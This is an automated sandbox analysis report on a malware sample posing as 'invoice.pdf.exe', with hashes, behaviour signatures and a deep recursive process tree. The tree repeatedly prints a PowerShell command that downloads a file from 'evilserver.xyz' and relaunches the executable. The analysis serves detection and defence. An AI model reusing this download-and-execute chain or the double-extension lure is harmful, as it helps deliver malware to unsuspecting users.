d173fdd600b0577f376067d758da1ccfa63daba40f5f9cbd1e0c14c13df739e4

Analysis

max time kernel
138s
max time network
132s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
02/10/2023, 16:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

invoice.pdf.exe
Size

302KB
MD5

e8c158e6c3ebf4a4ed03721dd541a7ef
SHA1

9efe7c2f9ff9659c8b16b8ea037458463bd02f14
SHA256

d173fdd600b0577f376067d758da1ccfa63daba40f5f9cbd1e0c14c13df739e4
SHA512

e1bfcbcb6a69dd6f127ee4a87a3ceb1b5ae43c478551762083b309098714421479b0da28b577344a9d1dcb3e3cbcdaaff8c458debb146d4356392d114673da4f
SSDEEP

1536:P7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfvxZRnpwwOL:jq6+ouCpk2mpcWJ0r+QNTBfvs

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: CmdExeWriteProcessMemorySpam 64 IoCs

pid	Process
2668	invoice.pdf.exe
2536	invoice.pdf.exe
1808	invoice.pdf.exe
1804	invoice.pdf.exe
1760	invoice.pdf.exe
1812	invoice.pdf.exe
3008	invoice.pdf.exe
1976	invoice.pdf.exe
2388	invoice.pdf.exe
2952	invoice.pdf.exe
2632	invoice.pdf.exe
2488	invoice.pdf.exe
2080	invoice.pdf.exe
1748	invoice.pdf.exe
2192	invoice.pdf.exe
2380	invoice.pdf.exe
2312	invoice.pdf.exe
1780	invoice.pdf.exe
2248	invoice.pdf.exe
2620	invoice.pdf.exe
2300	invoice.pdf.exe
1836	invoice.pdf.exe
2676	invoice.pdf.exe
1364	invoice.pdf.exe
1528	invoice.pdf.exe
1740	invoice.pdf.exe
804	invoice.pdf.exe
2368	invoice.pdf.exe
2228	invoice.pdf.exe
2644	invoice.pdf.exe
2164	invoice.pdf.exe
456	invoice.pdf.exe
1552	invoice.pdf.exe
2616	invoice.pdf.exe
1020	invoice.pdf.exe
2372	invoice.pdf.exe
2272	invoice.pdf.exe
2156	invoice.pdf.exe
1480	invoice.pdf.exe
3124	invoice.pdf.exe
3256	invoice.pdf.exe
3392	invoice.pdf.exe
3524	invoice.pdf.exe
3652	invoice.pdf.exe
3792	invoice.pdf.exe
3932	invoice.pdf.exe
4068	invoice.pdf.exe
3208	invoice.pdf.exe
3324	invoice.pdf.exe
3532	invoice.pdf.exe
3720	invoice.pdf.exe
3900	invoice.pdf.exe
3116	invoice.pdf.exe
3240	invoice.pdf.exe
3516	invoice.pdf.exe
3892	invoice.pdf.exe
4004	invoice.pdf.exe
3292	invoice.pdf.exe
3452	invoice.pdf.exe
3744	invoice.pdf.exe
3980	invoice.pdf.exe
2680	invoice.pdf.exe
3640	invoice.pdf.exe
3520	invoice.pdf.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2936	powershell.exe
2752	powershell.exe
2880	powershell.exe
588	powershell.exe
1096	powershell.exe
2988	powershell.exe
2280	powershell.exe
2232	powershell.exe
1548	powershell.exe
2056	powershell.exe
2912	powershell.exe
2612	powershell.exe
2420	powershell.exe
2396	powershell.exe
2284	powershell.exe
1600	powershell.exe
3012	powershell.exe
2364	powershell.exe
1260	powershell.exe
1424	powershell.exe
2504	powershell.exe
864	powershell.exe
1700	powershell.exe
2280	powershell.exe
2240	powershell.exe
2936	powershell.exe
1484	powershell.exe
2284	powershell.exe
1560	powershell.exe
304	powershell.exe
1080	powershell.exe
2808	powershell.exe
2980	powershell.exe
2636	powershell.exe
2272	invoice.pdf.exe
2980	powershell.exe
2232	powershell.exe
108	powershell.exe
2232	powershell.exe
1600	powershell.exe
608	powershell.exe
3172	powershell.exe
3304	powershell.exe
3440	powershell.exe
3572	powershell.exe
3704	powershell.exe
3840	powershell.exe
3980	powershell.exe
3092	powershell.exe
3192	powershell.exe
3404	powershell.exe
3584	powershell.exe
3708	powershell.exe
4028	powershell.exe
3204	powershell.exe
3312	powershell.exe
3736	powershell.exe
1876	powershell.exe
3996	powershell.exe
3340	powershell.exe
3640	invoice.pdf.exe
3708	powershell.exe
3264	powershell.exe
3492	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	2752	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	588	powershell.exe
Token: SeDebugPrivilege	1096	powershell.exe
Token: SeDebugPrivilege	2988	powershell.exe
Token: SeDebugPrivilege	2280	powershell.exe
Token: SeDebugPrivilege	2232	powershell.exe
Token: SeDebugPrivilege	1548	powershell.exe
Token: SeDebugPrivilege	2056	powershell.exe
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeDebugPrivilege	2396	powershell.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeDebugPrivilege	1600	powershell.exe
Token: SeDebugPrivilege	3012	powershell.exe
Token: SeDebugPrivilege	2364	powershell.exe
Token: SeDebugPrivilege	1260	powershell.exe
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeDebugPrivilege	864	powershell.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeDebugPrivilege	2280	powershell.exe
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	1484	powershell.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeDebugPrivilege	1560	powershell.exe
Token: SeDebugPrivilege	304	powershell.exe
Token: SeDebugPrivilege	1080	powershell.exe
Token: SeDebugPrivilege	2808	powershell.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeDebugPrivilege	2272	invoice.pdf.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	2232	powershell.exe
Token: SeDebugPrivilege	108	powershell.exe
Token: SeDebugPrivilege	2232	powershell.exe
Token: SeDebugPrivilege	1600	powershell.exe
Token: SeDebugPrivilege	608	powershell.exe
Token: SeDebugPrivilege	3172	powershell.exe
Token: SeDebugPrivilege	3304	powershell.exe
Token: SeDebugPrivilege	3440	powershell.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeDebugPrivilege	3704	powershell.exe
Token: SeDebugPrivilege	3840	powershell.exe
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeDebugPrivilege	3192	powershell.exe
Token: SeDebugPrivilege	3404	powershell.exe
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	3708	powershell.exe
Token: SeDebugPrivilege	4028	powershell.exe
Token: SeDebugPrivilege	3204	powershell.exe
Token: SeDebugPrivilege	3312	powershell.exe
Token: SeDebugPrivilege	3736	powershell.exe
Token: SeDebugPrivilege	1876	powershell.exe
Token: SeDebugPrivilege	3996	powershell.exe
Token: SeDebugPrivilege	3340	powershell.exe
Token: SeDebugPrivilege	3640	invoice.pdf.exe
Token: SeDebugPrivilege	3708	powershell.exe
Token: SeDebugPrivilege	3264	powershell.exe
Token: SeDebugPrivilege	3492	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 868 wrote to memory of 2888	868	invoice.pdf.exe	28
PID 868 wrote to memory of 2888	868	invoice.pdf.exe	28
PID 868 wrote to memory of 2888	868	invoice.pdf.exe	28
PID 868 wrote to memory of 2888	868	invoice.pdf.exe	28
PID 2888 wrote to memory of 2936	2888	cmd.exe	30
PID 2888 wrote to memory of 2936	2888	cmd.exe	30
PID 2888 wrote to memory of 2936	2888	cmd.exe	30
PID 2888 wrote to memory of 2668	2888	cmd.exe	31
PID 2888 wrote to memory of 2668	2888	cmd.exe	31
PID 2888 wrote to memory of 2668	2888	cmd.exe	31
PID 2888 wrote to memory of 2668	2888	cmd.exe	31
PID 2668 wrote to memory of 2492	2668	invoice.pdf.exe	32
PID 2668 wrote to memory of 2492	2668	invoice.pdf.exe	32
PID 2668 wrote to memory of 2492	2668	invoice.pdf.exe	32
PID 2668 wrote to memory of 2492	2668	invoice.pdf.exe	32
PID 2492 wrote to memory of 2752	2492	cmd.exe	34
PID 2492 wrote to memory of 2752	2492	cmd.exe	34
PID 2492 wrote to memory of 2752	2492	cmd.exe	34
PID 2492 wrote to memory of 2536	2492	cmd.exe	35
PID 2492 wrote to memory of 2536	2492	cmd.exe	35
PID 2492 wrote to memory of 2536	2492	cmd.exe	35
PID 2492 wrote to memory of 2536	2492	cmd.exe	35
PID 2536 wrote to memory of 2604	2536	invoice.pdf.exe	36
PID 2536 wrote to memory of 2604	2536	invoice.pdf.exe	36
PID 2536 wrote to memory of 2604	2536	invoice.pdf.exe	36
PID 2536 wrote to memory of 2604	2536	invoice.pdf.exe	36
PID 2604 wrote to memory of 2880	2604	cmd.exe	38
PID 2604 wrote to memory of 2880	2604	cmd.exe	38
PID 2604 wrote to memory of 2880	2604	cmd.exe	38
PID 2604 wrote to memory of 1808	2604	cmd.exe	39
PID 2604 wrote to memory of 1808	2604	cmd.exe	39
PID 2604 wrote to memory of 1808	2604	cmd.exe	39
PID 2604 wrote to memory of 1808	2604	cmd.exe	39
PID 1808 wrote to memory of 2472	1808	invoice.pdf.exe	40
PID 1808 wrote to memory of 2472	1808	invoice.pdf.exe	40
PID 1808 wrote to memory of 2472	1808	invoice.pdf.exe	40
PID 1808 wrote to memory of 2472	1808	invoice.pdf.exe	40
PID 2472 wrote to memory of 588	2472	cmd.exe	42
PID 2472 wrote to memory of 588	2472	cmd.exe	42
PID 2472 wrote to memory of 588	2472	cmd.exe	42
PID 2472 wrote to memory of 1804	2472	cmd.exe	43
PID 2472 wrote to memory of 1804	2472	cmd.exe	43
PID 2472 wrote to memory of 1804	2472	cmd.exe	43
PID 2472 wrote to memory of 1804	2472	cmd.exe	43
PID 1804 wrote to memory of 1140	1804	invoice.pdf.exe	44
PID 1804 wrote to memory of 1140	1804	invoice.pdf.exe	44
PID 1804 wrote to memory of 1140	1804	invoice.pdf.exe	44
PID 1804 wrote to memory of 1140	1804	invoice.pdf.exe	44
PID 1140 wrote to memory of 1096	1140	cmd.exe	46
PID 1140 wrote to memory of 1096	1140	cmd.exe	46
PID 1140 wrote to memory of 1096	1140	cmd.exe	46
PID 1140 wrote to memory of 1760	1140	cmd.exe	47
PID 1140 wrote to memory of 1760	1140	cmd.exe	47
PID 1140 wrote to memory of 1760	1140	cmd.exe	47
PID 1140 wrote to memory of 1760	1140	cmd.exe	47
PID 1760 wrote to memory of 1180	1760	invoice.pdf.exe	48
PID 1760 wrote to memory of 1180	1760	invoice.pdf.exe	48
PID 1760 wrote to memory of 1180	1760	invoice.pdf.exe	48
PID 1760 wrote to memory of 1180	1760	invoice.pdf.exe	48
PID 1180 wrote to memory of 2988	1180	cmd.exe	50
PID 1180 wrote to memory of 2988	1180	cmd.exe	50
PID 1180 wrote to memory of 2988	1180	cmd.exe	50
PID 1180 wrote to memory of 1812	1180	cmd.exe	51
PID 1180 wrote to memory of 1812	1180	cmd.exe	51

C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
"C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:868
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4A0B.tmp\4A0C.tmp\4A1C.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2936
- - C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
    invoice.pdf
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    PID:2668
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5486.tmp\5487.tmp\5488.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2492
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2752
    - - C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        5⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious use of WriteProcessMemory
        
        PID:2536
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5FAD.tmp\5FAE.tmp\5FAF.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2880
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        7⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious use of WriteProcessMemory
        
        PID:1808
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6B41.tmp\6B42.tmp\6B43.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:588
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        9⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious use of WriteProcessMemory
        
        PID:1804
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\760A.tmp\760B.tmp\760C.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:1140
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        11⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1096
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        11⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious use of WriteProcessMemory
        
        PID:1760
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\80A5.tmp\80A6.tmp\80A7.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        12⤵
        Suspicious use of WriteProcessMemory
        
        PID:1180
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        13⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2988
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        13⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1812
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8AE1.tmp\8AE2.tmp\8AE3.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        14⤵
        
        PID:2324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        15⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2280
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        15⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3008
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9953.tmp\9954.tmp\9955.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        16⤵
        
        PID:1256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        17⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2232
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        17⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1976
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A2A5.tmp\A2A6.tmp\A2A7.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        18⤵
        
        PID:1496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        19⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1548
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        19⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2388
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AAA1.tmp\AAA2.tmp\AAA3.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        20⤵
        
        PID:332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        21⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2056
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        21⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2952
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B0C9.tmp\B0CA.tmp\B0CB.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        22⤵
        
        PID:1148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        23⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2912
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        23⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2632
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B451.tmp\B452.tmp\B453.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        24⤵
        
        PID:2712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        25⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2612
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        25⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2488
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B78C.tmp\B79D.tmp\B79E.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        26⤵
        
        PID:2484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        27⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2420
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        27⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2080
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BD18.tmp\BD19.tmp\BD1A.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        28⤵
        
        PID:544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        29⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2396
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        29⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1748
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C10E.tmp\C11E.tmp\C11F.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        30⤵
        
        PID:980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        31⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2284
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        31⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2192
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C4D5.tmp\C4D6.tmp\C4D7.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        32⤵
        
        PID:1660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        33⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1600
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        33⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2380
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C88D.tmp\C88E.tmp\C88F.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        34⤵
        
        PID:2820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        35⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3012
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        35⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2312
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CC54.tmp\CC64.tmp\CC65.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        36⤵
        
        PID:1500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        37⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        37⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1780
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CFFC.tmp\CFFD.tmp\CFFE.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        38⤵
        
        PID:1768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        39⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1260
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        39⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2248
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\D3D5.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        40⤵
        
        PID:1400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        41⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1424
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        41⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2620
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D6DF.tmp\D6EF.tmp\D6F0.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        42⤵
        
        PID:2684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        43⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2504
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        43⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2300
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DA77.tmp\DA78.tmp\DA79.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        44⤵
        
        PID:752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        45⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:864
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        45⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1836
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DE2F.tmp\DE30.tmp\DE31.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        46⤵
        
        PID:1252
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        47⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1700
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        47⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2676
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E1B8.tmp\E1B9.tmp\E1BA.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        48⤵
        
        PID:2208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        49⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2280
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        49⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1364
        
